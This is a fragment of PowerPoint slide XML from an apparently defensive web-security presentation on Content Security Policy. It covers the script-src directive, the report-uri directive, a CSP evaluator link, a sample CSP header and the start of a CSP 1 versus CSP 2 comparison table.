              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>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84" y="2067694"/>
            <a:ext cx="7608590" cy="468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121" y="2715766"/>
            <a:ext cx="7560063" cy="829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584" y="3741319"/>
            <a:ext cx="7412450" cy="759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Connecteur droit 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555776" y="4227934"/>
            <a:ext cx="18002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47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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6869072"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800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  	        CSP</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07504" y="771550"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>evolution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> » </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>directive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> to configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: use « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> » directive </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Compatibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>issues : use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://csp-evaluator.withgoogle.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a typical CSP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>; style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'unsafe-inline' 'self' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://fonts.googleapis.com https://themes.googleusercontent.com;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> frame-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://www.slideshare.net www.youtube.com twitter.com;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> object-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'none'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>; font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'self' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://themes.googleusercontent.com https://fonts.googleapis.com; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'strict-dynamic' 'nonce-rAnd0m123' 'unsafe-inline' 'self' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://www.google.com twitter.com https://themes.googleusercontent.com;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'none'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>'self' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://www.google.com data: https://pbs.twimg.com https://img.youtube.com twitter.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Tableau 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3901227874"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="107504" y="1160398"/>
          <a:ext cx="8928990" cy="1483360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{3B4B98B0-60AC-42C2-AFA5-B58CD77FA1E5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2520279"/>
                <a:gridCol w="3168352"/>
                <a:gridCol w="3240359"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>CSP 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>CSP 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
